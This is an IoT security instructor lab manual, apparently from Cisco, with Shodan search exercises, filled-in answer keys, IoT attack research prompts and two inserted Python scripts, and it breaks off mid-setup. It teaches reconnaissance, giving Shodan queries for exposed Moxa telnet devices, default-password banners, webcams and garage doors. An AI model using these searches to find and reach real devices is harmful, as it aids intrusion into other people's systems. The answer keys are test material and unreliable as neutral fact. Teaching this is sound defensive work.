
Internet of Things Fundamentals:

IoT Security v1.0


Instructor Lab Manual

This document is exclusive property of Cisco Systems, Inc. Permission is granted to print and copy this
document for non-commercial distribution and exclusive use by instructors in the Internet of Things
Fundamentals curriculum as part of an official Cisco Networking Academy Program.
Lab – Shodan Search (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Obtain Access to Shodan’s Free Features
Part 2: Investigate Connected IoT Devices

Background / Scenario
Warning: Do not attempt to login to any device you find on the Shodan search engine. Doing so violates your
ethical hacking agreement.
In this lab, you will use the Shodan search engine to gain an understanding of why security should be the
focus of any IoT implementation.
Shodan has servers located around the world that continually crawl the Internet looking for connected
devices. It can find specific devices and device types. This data can then be searched. Some of the more
popular searches include terms such as "webcam", "default passwords", "routers", "video games," and more.
Shodan is a favorite tool used by researchers, security professionals, large enterprises, and computer
emergency response teams (CERTs).
• Researchers can use Shodan to data mine information about what devices are connected, where they
are connected, and what services are exposed.
• Security professionals can use Shodan as part of a penetration testing plan to discover devices that need
to be hardened to prevent potential attacks.
• Large enterprises employ security professionals who should be aware of tools like Shodan for
determining the current risk profile of the enterprise’s connected devices.
• CERTs can use Shodan to quickly generate reports about an emerging attack on connected devices.
Shodan is also a tool used by nefarious individuals and groups commonly referred to as threat actors. Shodan
can accelerate a threat actor’s reconnaissance of Internet connected devices. Like all the tools in this course,
you must use it responsibly according to your organization’s ethical hacking policies.
Instructor Note: Shodan is a powerful website where students can easily get into trouble. For example,
students can find default login information and use it to access the configuration webpage for a device. This
violates ethical hacking agreements.

Required Resources
• Device with Internet access.
• SANS Penetration Testing article, “Getting the Most Out of Shodan Searches”

Part 1: Obtain Access to Shodan’s Free Features


In this part of the lab, you will navigate to the Shodan search engine and sign up for an account.
a. Open a web browser and navigate to the Shodan website at https://www.shodan.io/.
b. Create an account in one of two ways:

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 5 www.netacad.com
Lab - Shodan Search

1) If you click Create a Free Account, you will be directed to a page where you can fill in a form to
create an account on Shodan.
2) If you click Login or Register, you will be directed to a page where you can sign in with one of
several other accounts that you may have, including Google or Facebook.
c. After successfully logging in, you will see your account page, as shown below. Click the Shodan link to
return to the homepage.

Part 2: Investigate Connected IoT Devices


In this part, you will gain familiarity with using Shodan’s features to search for Internet-connected devices.

Step 1: Use the basic features of the Shodan search engine.


From the main page, you can type keywords in the search field to get a list of results.
a. Type cisco as the keyword and press Enter. How many results did you get for your search?
____________________________________________________________________________________
At the time of testing this lab, this search returned over 2 million results.
Note: Not every device that is found by Shodan is insecure. Shodan simply finds devices that are
accessible from the Internet according to a set of search criteria.
b. Look at other information on the left side of the web page. Your search result is broken down into various
categories. Each entry in a category is a clickable link that will refine your search.
How many results, if any, are there for the Windows XP operating system? ________________________
At the time of testing this lab, this search returned 19 results for Windows XP OS.
c. Although Microsoft stopped supporting Windows XP in April 2014, it continues to release patches for it
because there are so many end devices still using the operating system. Use an Internet search to
discover the well-known 2017 cyberattack that targeted older Windows operating systems.
What was the attack called, what did it target, and what did it do?
____________________________________________________________________________________
WannaCry or WannaCrypt ransomware targeted unpatched, older versions of Windows, encrypted the
users’ data, and demanded ransom payments in Bitcoin.
From your research, you should have noted that this attack targeted unpatched systems. Prior to the
attack, Microsoft had released patches that addressed the vulnerabilities. The systems that were affected
by the attack were ones that had not downloaded and applied the patches. Unpatched software is a
primary attack vector for threat actors. Any connected device is vulnerable to this type of attack. In the IoT
landscape, patching devices becomes even more important as tools such as Shodan can quickly reveal
your device’s information, including potential vulnerabilities, to the world.

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 5 www.netacad.com
Lab - Shodan Search

Note: Not all devices discovered by Shodan are vulnerable. Shodan results consist of Internet-connected
devices and information about those devices. This information may or may not reveal potential
vulnerabilities.
d. On the right side, the main section of your search shows the devices that match your search. Find an
entry that looks interesting to you and fill in the information below.
IP address: ___________________________________________________________________________
Hostname: ___________________________________________________________________________
ISP: ________________________________________________________________________________
Date the entry was added: _______________________________________________________________
Country: _____________________________________________________________________________
e. Your entry will also show some banner information. You may see the beginnings of an SSH banner or an
HTTP banner. Click Details for more information about your entry. You should see several open ports. If
not, try a different entry. List the information you found below.
City and Country: ______________________________________________________________________
Ports open: __________________________________________________________________________
Services running: ______________________________________________________________________
Key types: ___________________________________________________________________________
Answers will vary. Encourage students to look for a variety of open ports including 22 (SSH), 25 (SMTP),
80 (HTTP), 123 (NTP), and 443 (HTTPS). They should be able to find one that lists the encryption keys
for SSH.
f. Return to the Shodan homepage and click Explore. What are some of the Top Voted results?
____________________________________________________________________________________
At the time of testing this lab, Top Voted results included Webcam, Cams, Netcam, default password, and
dreambox.
One of the Top Voted results for you may have been default password. If so, click default password to
see the results. If not, in the search field, type the keywords “default password,” with the quotes, and
press Enter. You will see several results that show default passwords embedded in the banners for
devices. Hopefully, the owners of these devices have changed the default password. However, this
highlights how easy it can be to login to a device if appropriate security measures are not implemented.
Warning: Do not attempt to login to any device you find on the Shodan search engine. Doing so violates
your ethical hacking agreement.
g. In the search field, type the keyword “webcam” with the quotes and press Enter. What is your count for
Total Results?
____________________________________________________________________________________
At the time of testing this lab, Total Results was over 6,000.
h. In the search field, type the keyword “refrigerator” with the quotes and press Enter. What is your count for
Total Results?
____________________________________________________________________________________
At the time of testing this lab, Total Results was 193.

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 5 www.netacad.com
Lab - Shodan Search

Step 2: Use keywords together with search operators to filter your search.
You may have noticed that you can only get two pages of results with your free account access. However,
even with a paid account you would not want to click through the pages that list thousands or millions of
results. Instead, you can combine keywords and search operators to filter your results.
Shodan searches for the services running on a device. It then collects banner information for each service.
For example, here is the banner information for the SNMP service running on a Cisco device found with the
Shodan search:
Cisco Internetwork Operating System Software
IOS (tm) 7200 Software (UBR7200-IK9SU2-M), Version 12.3(23)BC10, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2011 by cisco Systems, Inc.
A search for just "cisco" most likely reveals one to two million results for you. That information may be helpful
to you. However, if you are interested in more specific information, you will want to filter your search using
filter names and values from the banner information.
For example, if you are interested in seeing how many Cisco 7200 routers in the United States are running
the SNMP service, you would enter the following search phrase.
country:US product:"Cisco 7200 Router" port:161
Note: Shodan searches use the two letter (alpha-2) country code based on the International Standards
Organization’s 3166 publication (ISO 3166-1993).
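The two ideas in this step, reading fields out of a captured banner and then turning those fields into a filtered search phrase, can be automated. The Python script below is an added illustration for this lab and is not part of the Cisco lab or of Shodan's own tooling. It parses the IOS banner quoted above, compares the disclosed version against a placeholder baseline (the baseline value and the "default password" check are assumptions made for the example, not Cisco advisories), and builds a Shodan search phrase with the quoting and country-code validation the lab describes. This is the kind of check a defender runs over an export of their own banners to find what they are disclosing to the world.

```python
import re

# Banner text quoted in the lab for the SNMP service on a Cisco device (joined onto one line).
SAMPLE_BANNER = (
    "Cisco Internetwork Operating System Software\n"
    "IOS (tm) 7200 Software (UBR7200-IK9SU2-M), Version 12.3(23)BC10, RELEASE SOFTWARE (fc1)\n"
    "Technical Support: http://www.cisco.com/techsupport\n"
    "Copyright (c) 1986-2011 by cisco Systems, Inc."
)

# Pulls platform, image name, version and release train out of the IOS version line.
IOS_BANNER_RE = re.compile(
    r"IOS \(tm\) (?P<platform>\S+) Software \((?P<image>[^)]+)\), "
    r"Version (?P<version>[^,]+), (?P<release>[A-Z ]+SOFTWARE) \((?P<train>[^)]+)\)"
)

# ISO 3166-1 alpha-2 codes are exactly two upper-case letters (US, BR, ZA, ...).
ALPHA2_RE = re.compile(r"^[A-Z]{2}$")


def parse_ios_banner(banner):
    """Return the fields an asset inventory would record, or None if this is not an IOS banner."""
    m = IOS_BANNER_RE.search(banner)
    return m.groupdict() if m else None


def ios_version_key(version):
    """Turn '12.3(23)BC10' into (12, 3, 23) so versions can be compared numerically."""
    m = re.match(r"(\d+)\.(\d+)\((\d+)\)", version)
    if not m:
        raise ValueError(f"unrecognised IOS version string: {version!r}")
    return tuple(int(x) for x in m.groups())


def banner_findings(banner, baseline="12.4(0)"):
    """List what a banner gives away. The baseline is a placeholder chosen for this example."""
    findings = []
    info = parse_ios_banner(banner)
    if info:
        findings.append(f"version disclosed: {info['version']} on platform {info['platform']}")
        if ios_version_key(info["version"]) < ios_version_key(baseline):
            findings.append(f"version older than baseline {baseline}")
    if "default password" in banner.lower():
        findings.append("banner hints at default credentials")
    return findings


def build_query(*keywords, **filters):
    """Compose a Shodan search phrase from free-text keywords and filter:value pairs.

    Values containing spaces are double-quoted, matching the lab's product:"Cisco 7200 Router".
    The country filter must be an alpha-2 code and the port must be a valid TCP/UDP port.
    """
    parts = list(keywords)
    for name, value in filters.items():
        if name == "country" and not ALPHA2_RE.match(str(value)):
            raise ValueError("country must be an ISO 3166-1 alpha-2 code such as US or ZA")
        if name == "port" and not 1 <= int(value) <= 65535:
            raise ValueError(f"port out of range: {value}")
        value = str(value)
        if " " in value:
            value = f'"{value}"'
        parts.append(f"{name}:{value}")
    return " ".join(parts)


if __name__ == "__main__":
    for line in banner_findings(SAMPLE_BANNER):
        print("finding:", line)
    print(build_query(country="US", product="Cisco 7200 Router", port=161))
    print(build_query("Minecraft", port=25565, country="ZA"))
```

Running the script prints the two findings for the quoted banner and the two search phrases, the first of which is the exact phrase given in the lab text. Rejecting a three-letter country code up front saves a query that Shodan would otherwise silently match against nothing.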
Create your own searches to find the following:
a. Minecraft is a popular video game where players can set up their own servers for others to access online.
Use an Internet search to find the following information.
What is the common port number used by Minecraft servers? ____________ 25565
What is the ISO 3166 alpha-2 code for South Africa? __________ ZA
What Shodan search phrase can you use to discover how many Minecraft servers are currently online in
South Africa?
____________________________________________________________________________________
Minecraft port:"25565" country:"ZA"
How many Minecraft servers are currently online in South Africa? ________________________________
At the time of testing this lab, Total Results was 318.
b. Moxa is a supplier of devices that connect industrial equipment to the Internet. How many Moxa devices
are running the Telnet service in Brazil?
Search phrase: _______________________________________________________________________
moxa port:"23" country:"BR"
Total results:
____________________________________________________________________________________
At the time of testing this lab, Total Results was 5.
c. Use an Internet search or review Shodan help pages and tutorials to discover how you can filter your
searches based on a range of IP addresses.
d. Mr. Robot is an American drama television series that chronicles the adventures of a cybersecurity
engineer. In the series, the protagonist uses the Shodan search engine to research a fictional corporation.
Use an Internet search to find the search string that was used to discover E Corp’s web server.

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 5 www.netacad.com
Lab - Shodan Search

What string was used?


____________________________________________________________________________________
org:"Evil Corp" product:"Apache Tomcat"
Does the string work on the Shodan search engine? _____________________________ Yes
What IP address was returned by the search? __________________________________ 192.251.68.223
What is the URL for the IP address?
____________________________________________________________________________________
compute.evil-corp-usa.com
e. There are many home devices connected and controlled using IoT. Apply the methods previously used to
search for “garage door” in the state of Michigan in the United States. What was the search string you
used?
____________________________________________________________________________________
country:US state:MI "garage door"
How many results were returned?
____________________________________________________________________________________
16 at the time of this testing
What was the top city listed with the most connected garage doors?
____________________________________________________________________________________
Lansing, with 10 at the time of testing
What are the potential risks of someone having access to this information?
____________________________________________________________________________________
____________________________________________________________________________________
Hackers could take control of the garage door. It could then be opened to allow thefts from the garage or
home.
f. You can check to see if your IP address has any vulnerabilities by using the Internet of Things Scanner at
the following address: https://iotscanner.bullguard.com. Click Check if I am on Shodan to allow the
“Internet of Things Scanner” to scan your IP address. This process may take some time to complete.

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 5 www.netacad.com
Lab - Evaluate Recent IoT Attacks (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Research Recent IoT Attacks
Part 2: Describe Mitigation Techniques

Background / Scenario
As the number of IoT devices continues to grow at an exponential rate, so does the number of attacks on these
devices. A wide variety of attacks on IoT devices have been documented and reported in the news.
As an IT professional working with IoT devices, it is important to be aware of the wide range of attacks and
vulnerabilities that have occurred on these devices. It is also important to know how to defend against and
minimize the damage from these types of attacks.

Required Resources
• PC or mobile device with Internet access

Part 1: Research Recent IoT Attacks


In this part of the lab, you will research and describe three different types of IoT attacks using the following
steps:
a. Launch your favorite web browser and go to your favorite search engine, such as Google.com.
What key terms will you use to search for recent IoT related security attacks?
____________________________________________________________________________________
____________________________________________________________________________________
b. Go through the results and find the most interesting attacks that have occurred within the last 5 years.
c. Choose three different types of attacks to document in this lab.
d. Describe the attacks in detail. Make sure you answer the following questions:
1) What was the name or type of attack?
2) What was targeted?
3) Who was affected?
4) How did the attack occur? Describe the details of what happened.
5) What is the source of your information? Include the URL.

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 4 www.netacad.com
Lab - Evaluate Recent IoT Attacks

Attack #1:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
DDoS attack on DNS provider Dyn.
Cyber attack that knocked out major websites such as Twitter, GitHub, Spotify, and Shopify.
The Mirai botnet targets poorly protected IoT connected devices and uses them to launch a DDoS attack
against specific targets. A Chinese electronics manufacturer admitted that its products inadvertently contributed
to this attack. In this particular attack, the Mirai botnet used DVRs and IP cameras made by a Chinese
electronics manufacturer.
http://www.foxnews.com/tech/2016/10/25/ddos-attackers-exploited-insecure-iot-gadgets-from-chinese-company.amp.html
Attack #2:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 4 www.netacad.com
Lab - Evaluate Recent IoT Attacks

Attack #3:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________

Part 2: Describe Mitigation Techniques


In this part of the lab, you will reflect on how each of these attacks could be mitigated. For example, you might
research and answer the following questions:
• Could this attack have been prevented?
• Can it be defended against?
• What measures need to be implemented in order to mitigate these attacks or minimize the impact?
• What other information about the attack should be described?
Attack #1:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
The attack described in the URL below was a DDoS attack that used vulnerable IoT devices. A DDoS
attack can be mitigated by ISPs that try to block malicious traffic. If the traffic is not blocked by the ISP,
a targeted company can block the packets from entering its network, but it is likely that its bandwidth will be
consumed by the attack. It is also very difficult to block the packets because they come from many different IP
addresses, and it is possible that legitimate traffic could also be blocked. This particular DDoS attack could
have been prevented if IoT device manufacturers had done a better job securing their devices. If machines or
devices couldn’t be infected with botnet malware, then these types of attacks wouldn’t happen in the first place.
http://www.foxnews.com/tech/2016/10/25/ddos-attackers-exploited-insecure-iot-gadgets-from-chinese-company.amp.html
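The sample answer above makes a point that is easy to state and hard to see: when the flood comes from many compromised devices, a per-source rate limit finds nothing to block, while the aggregate still saturates the target. The Python script below is an added illustration for this lab (it is not part of the Cisco lab and uses no real attack data). It generates a constructed DNS query log with three normal clients and a burst from 300 distinct documentation-range addresses that each send only two queries, then evaluates both a per-source and an aggregate threshold over ten-second windows. The window size and the two limits are assumptions chosen for the example.

```python
from collections import Counter, defaultdict
import ipaddress
import random

WINDOW_SECONDS = 10
PER_SOURCE_LIMIT = 50   # queries per source per window before one client looks abusive
AGGREGATE_LIMIT = 500   # total queries per window this (imaginary) resolver is sized for


def make_sample_log(seed=1):
    """Constructed DNS query log as (timestamp, source_ip) tuples; not captured traffic.

    Three normal clients query once per second for 30 seconds. Between seconds 10 and 20,
    300 distinct 'bot' addresses from the RFC 5737 documentation ranges send two queries each.
    """
    rnd = random.Random(seed)
    events = []
    normal = ["192.0.2.10", "192.0.2.11", "192.0.2.12"]
    for t in range(30):
        for ip in normal:
            events.append((float(t), ip))
    bots = [str(ipaddress.ip_address("198.51.100.0") + i) for i in range(1, 255)]
    bots += [str(ipaddress.ip_address("203.0.113.0") + i) for i in range(1, 47)]
    for ip in bots:
        for _ in range(2):
            events.append((10 + rnd.random() * 10, ip))
    events.sort()
    return events


def bucket_by_window(events):
    """Group source addresses into fixed ten-second windows keyed by window index."""
    buckets = defaultdict(list)
    for ts, ip in events:
        buckets[int(ts // WINDOW_SECONDS)].append(ip)
    return buckets


def analyze(events):
    """Per window: total queries, distinct sources, which sources a per-source limit would
    block, and whether the aggregate limit fires. The contrast is the lesson."""
    report = {}
    for window, ips in sorted(bucket_by_window(events).items()):
        counts = Counter(ips)
        report[window] = {
            "total": len(ips),
            "distinct_sources": len(counts),
            "per_source_offenders": sorted(ip for ip, n in counts.items() if n > PER_SOURCE_LIMIT),
            "aggregate_alert": len(ips) > AGGREGATE_LIMIT,
        }
    return report


if __name__ == "__main__":
    for window, row in analyze(make_sample_log()).items():
        print(f"window {window}: total={row['total']} distinct={row['distinct_sources']} "
              f"blocked_by_per_source_rule={len(row['per_source_offenders'])} "
              f"aggregate_alert={row['aggregate_alert']}")
```

In the burst window the per-source rule blocks nobody (every bot is well under the limit), the aggregate alert fires, and the distinct-source count jumps from 3 to 303. That spread of low-rate sources is why the answer above says blocking at the target is both hard and prone to dropping legitimate traffic, and why the durable fix is keeping the devices from being recruited in the first place.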

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 4 www.netacad.com
Lab - Evaluate Recent IoT Attacks

Attack #2:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Attack #3:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 4 www.netacad.com
Lab - Evaluate Home Automation Products (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Conduct Research for Home Automation Products
Part 2: Prepare a Presentation

Background / Scenario
In this lab, you will investigate the wide variety of home automation products. Some products may require
monitoring or maintenance services, so your geographical location will most likely have an impact on your
choices.
Assume you have a budget of $1000 (or equivalent local currency) and the choice of one primary objective for
home automation:
• Increases convenience
• Enhances security
• Saves energy
You will choose an objective and conduct online research to find home automation products to satisfy your
objective. You will then select the desired products keeping the total cost under $1,000 and prepare a
presentation about what you bought, how it achieves your goal, and how the system will be used by the
customer.
Instructor Note: This is an open-ended lab assignment. Answers will vary widely based on what the student
chooses as an objective and the location. The primary purpose of the lab is for students to build an awareness of
the wide variety of offerings available for home automation.

Required Resources
• PC or mobile device with Internet access
• Presentation preparation software

Part 1: Conduct Research for Home Automation Products


Home automation products represent a large portion of the IoT. Home automation primarily has the following
benefits:
• Increases convenience
• Enhances security
• Saves energy
Complete the following steps to conduct research for home automation products.
a. Launch your favorite web browser and open a search engine such as Google.com.
b. What types of products do you want to search for?
____________________________________________________________________________________

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 3 www.netacad.com
Lab - Evaluate Home Automation Products

c. Record some examples of search terms you used to find products.


____________________________________________________________________________________
d. Record the most useful websites you found from your searches.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
e. Spend time doing some research on the wide variety of products that are offered or reviews on these
products using several websites.
What are your goals for purchasing these products assuming a budget of $1000?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
f. Search for these products at various vendors and companies. What key terms did you use to find these
products?
____________________________________________________________________________________
____________________________________________________________________________________
g. Read through the results and modify your searches as necessary in order to find the best companies with
the best prices selling the products that you decide to purchase.
Make list of your desired products keeping in mind your budget of $1000.00.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
h. Find the best prices looking through at least 2-3 different vendors and companies selling these products.
What companies did you select for researching prices?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
i. Verify that the total that you spent does not exceed $1000.00. Make sure that you include taxes and
shipping costs, as necessary.

Part 2: Prepare a Presentation


Prepare a presentation about the products you selected, how they achieve your objective, and how the
customer will use the products.

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 3 www.netacad.com
Lab - Evaluate Home Automation Products

Describe your goals for this project. What was your objective?
Describe the products that you chose for purchase including their complete cost.
How close to $1000 did you spend?
Describe how the products help achieve your goals.
Explain what your new system would look like and how it functions.
Use the following space to draft your notes for presentation preparation.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 3 www.netacad.com
Lab - Evaluate the IoT Security Risk in an Industry Sector
(Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Research Risks for an Industry Sector
Part 2: Investigate the Potential Impact of a Security Breach
Part 3: Describe Security Measures for Your Industry Sector

Background / Scenario
Any implementation of IoT is going to have risk associated with it. Risks could range from fairly insignificant to
very destructive depending on the market, equipment, number of people affected, and numerous other
factors.
In this lab, you will research an industry sector and evaluate the risks associated with implementing an IoT
solution. One of the following industry sectors will be assigned to you.
• agriculture
• automotive
• banking
• construction
• education
• healthcare
• manufacturing
• mining
• retail
• technology industries
• utilities
Instructor Note: This would be a good activity to have students work in groups to brainstorm some ideas and
then present their findings in a quick 5-minute executive summary. Also, it may be worthwhile to initiate a
discussion within the course forum to solicit more dialog.

Required Resources
• Computer with Internet access to be used for research

Part 1: Research Risks for an Industry Sector


In Part 1, you will research your industry sector to determine the risks posed by a security breach. The
questions will guide you through some of the things you should look for when determining the severity of an
IoT security breach. There are many other questions that could be asked to determine risk. Try to formulate
other questions that would be important for determining risk.

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 3 www.netacad.com
Lab - Evaluate the IoT Security Risk in an Industry Sector

a. What types of communications services or protocols are used for connecting IoT devices in your industry
sector?
____________________________________________________________________________________
____________________________________________________________________________________
Wired or wireless Ethernet, serial communication, I2C, Bluetooth, cellular, http, https
b. What are some of the known vulnerabilities?
____________________________________________________________________________________
____________________________________________________________________________________
Wi-Fi may use weak encryption, HTTP is plain text, Bluetooth can be hijacked, serial communication can be
tapped into, and Ethernet traffic in general can be sniffed and captured.
c. What type of data is being transmitted or stored?
____________________________________________________________________________________
____________________________________________________________________________________
Would altering the data transmitted or stored be damaging? Altered data such as health readings could
pose a life-threatening situation. Data such as storm information could cause a panic much like what
happened in Hawaii earlier this year.
d. What types of equipment are being monitored or managed?
____________________________________________________________________________________
____________________________________________________________________________________
Depending on the vertical, equipment monitored could be anything from a healthcare device to electrical
grid equipment.
e. What other questions are unique to your industry sector?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________

Part 2: Investigate the Potential Impact of a Security Breach


In this part, use the information gathered from your research above to answer the following questions:
a. What is the security risk with the data being compromised?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Is the risk life threatening, financial, personal, etc.?

b. Is the security risk life threatening? In what way is safety impacted?


____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Certainly, healthcare device tampering has the potential to be life threatening. Tampering with things like
the electrical grid could have a major impact on many peoples’ lives.
c. Does the security risk pose a financial loss? Describe the financial impact.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Almost any security breach has some financial impact. Losses could stem from lost time, damaged
equipment, or compromised confidential data.
d. Does the security risk expose personal identity information? What types of information might be exposed?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
If the breach lets the attacker gain internal access, it is possible that PII may be compromised. The Target
breach exposed millions of individuals.

Part 3: Describe Security Measures for Your Industry Sector


Based on your research, construct an argument for what security measures are needed in your industry
sector. Discuss your findings with the other groups to see if you can come to a consensus on security
measures that all the industry sectors have in common. What security measures are unique to your industry
sector?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________

Lab - Set Up PL-App on a Raspberry Pi (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Lab Topology

Objectives
• Set up a Raspberry Pi board as a Prototyping Lab Application (PL-App) device
• Use PL-App Launcher to provision and discover PL-App devices

Background
The IoT Security lab topology uses a Raspberry Pi that is connected to a PC. The PC will be used to work
with Python and Jupyter notebooks that are running on the Raspberry Pi. In addition, for some labs, the PC
will run a virtual machine (VM) that interacts with the Pi.
PL-App consists of two components. The first is the PL-App Launcher application that runs on the PC. It is
used to provision a PL-App image that is written to a microSD (µSD) card for the Raspberry Pi. The second
is PL-App itself, which runs on the Raspberry Pi. It contains the Jupyter notebooks software and enables
access to the notebooks and other functions of the Raspberry Pi.
With PL-App, you can access existing IoT Fundamentals labs in the Course Materials folder or write your own
new applications directly on the Raspberry Pi, execute them, and monitor the output from the board with
various visualizations.

Required Resources
• PL-App Launcher application
• PL-App Image file
• Wired Ethernet or Wi-Fi connection to the local-area network with DHCP
• Raspberry Pi with a power adapter
• Google Chrome or other modern web browser
• 8GB µSD
• USB to µSD card reader

Part 1: Setting up the PL-App

Step 1: Download and Install the PL-App Launcher.


a. Navigate to www.netacad.com in your web browser and access your IoT Security class.
b. From the Student Resources page, download the PL-App Launcher application installer for your operating
system.
c. After a successful download, install the PL-App Launcher application.
Note: Windows 7+ and Mac OS are supported. See the procedure at the alternate step 4 for manually
installing PL-App on a Linux computer from the command line.
d. After a successful installation, start the PL-App Launcher.

Step 2: Download and Install the PL-App Image.


From the Student Resources page, download the PL-App image zip file. Although the PL-App image is a file
with a .zip extension, there is no need to unpack the ZIP file.
Note: The PL-App image file is large and the download speed will vary based on your Internet connection.
Instructor Note: In a classroom with multiple computers, consider distributing the PL-App image file using a
USB memory stick or using a local file server.

Step 3: Set up a micro SD card with PL-App.


a. Start the PL-App Launcher application. You should see the following screen with the Setup a New
Device tab selected:

b. Obtain a µSD card that is at least 8 GB in size.


c. Insert the µSD card into your SD card reader and connect the reader to your computer.
d. Determine the drive letter of the µSD card using the file explorer.

e. In this example, it is the D: drive.


f. In the PL-App Launcher, select the µSD Card Removable Drive, in this example select the [D:\] drive. If
not present in the menu, click the Refresh button.
Be careful to select the correct drive; if you select the wrong drive, you might destroy your data
on the selected drive.
g. Click the Find Image: Browse button in the application and select the PL-App image zip file that you
downloaded.

Step 4: Configure the Image.


a. To personalize the PL-App installation on the µSD card, enter the configurations section of the PL-App
Launcher application and configure:
o Device Name - This is the name of the PL-App Raspberry Pi instance on your LAN. Make sure the
selected device name is unique on the LAN, otherwise naming problems might occur. For example,
you can use your name followed by a number, or your username, or initials (e.g. myname-myRPi1).
The Device Name can contain letters (a-z), numbers (0-9) and dashes (-). The first character must be
a letter.
o Device Password - This is a password that you will need to enter when accessing PL-App on the
Raspberry Pi. The password is stored in its clear-text form on the µSD card. For security reasons,
always use a unique password (i.e. never use the same password as your email, social media,
netacad.com, etc.).
Instructor Note: PL-App Launcher can also be used to find Raspberry Pis on the network and provide an
easy way to connect to them. However, PL-App Launcher will only list the devices that are running
images that were created on a specific computer. In other words, if a Raspberry Pi is connected to a
computer other than the one on which its PL-App image was created, it will not appear in the list of
Available Devices (see below). It is possible to manually enable PL-App Launcher to find other Raspberry
Pis on the network, however the device name must be known. For this reason, it is important to make
note of the device names provided to the PL-App images.

b. If your Raspberry Pi will be connected to the network over Wi-Fi, enter the optional settings section and
configure the following:
o Wi-Fi SSID - The name of the Wi-Fi network to join (e.g. ClassroomWiFi)
o Wi-Fi Password - The WPA2 Pre-Shared Key
c. When your settings are correct, click the Write Disk Image button to write the PL-App image to the
selected SD card. This will overwrite all data on the card. The process will also write your configuration
settings to the SD card in a file called chestnut.txt. Depending on the speed of your µSD card, this
process might take 5-10 minutes to complete.
Note: If the µSD card has already been flashed with the PL-App image, and you only want to change the
existing settings (e.g. Device Name, Wireless Settings, etc.), then click the Update Config Only button to
update only the setup configuration.
d. When the µSD card setup is complete, use the file explorer to verify the contents of the µSD card. You
should see the µSD card drive name has changed to CISCO-PLAPP.
e. Explore the µSD card drive. You should see the notebooks folder and the chestnut.txt setup file:

o The D:\chestnut.txt file contains the setup information that was created using the PL-App Launcher. If
you need to change any of these settings, you can either use the PL-App Launcher with the Update
Config Only button to update these settings and preserve all the other contents of the SD card, or
edit this file manually.
o The D:\notebooks\Course Materials folder contains all the default notebook files that were bundled
with the release of the PL-App image that was flashed on the µSD card. If you want the most recent,
or unmodified, version of the lab notebooks, download the notebooks zip archive from the course
page and unpack it to the D:\notebooks\Course Materials\coursename folder (the drive letter D: might
be different on your computer). You can also easily backup either your own notebook files, or the
